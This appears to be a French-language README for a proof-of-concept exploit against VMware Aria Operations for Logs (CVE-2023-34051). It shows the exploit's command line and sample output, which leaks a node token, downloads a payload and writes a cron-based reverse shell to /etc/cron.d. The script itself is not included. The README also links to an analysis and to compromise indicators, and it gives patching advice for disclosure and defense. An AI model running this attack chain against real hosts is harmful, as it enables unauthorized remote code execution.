
VMware Aria Operations for Logs CVE-2023-34051
CVE-2023-34051 est un contournement d'authentification qui contourne le correctif de VMSA-2023-0001. VMSA-2023-0001 pour vRealize Log Insight inclut les CVE suivantes :
La configuration par défaut de cette vulnérabilité écrit une tâche cron pour créer un
reverse shell. Assurez-vous de modifier le fichier payload pour l'adapter à votre environnement.
Une analyse technique de la cause racine de la vulnérabilité est disponible sur notre blog : https://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive
Pour analyser les instances Log Insight à la recherche d'indicateurs de compromission, consultez notre blog IOC : https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/
Ce POC abuse de l'usurpation d'adresse IP et de divers points de terminaison RPC Thrift pour parvenir à une écriture arbitraire de fichier.
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered
Pour que cette attaque fonctionne, un attaquant doit avoir la même adresse IP qu'un nœud maître / worker. Voir le blog ci-dessus pour plus de détails.
Si vous utilisez une charge utile basée sur cron, assurez-vous que le fichier de charge utile a les permissions et le propriétaire appropriés :
sudo chown root:root payload
sudo chmod 0644 payload
Mettez à jour vers la dernière version ou atténuez le risque en suivant les instructions dans la VMSA https://www.vmware.com/security/advisories/VMSA-2023-0021.html
Ce logiciel a été créé purement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.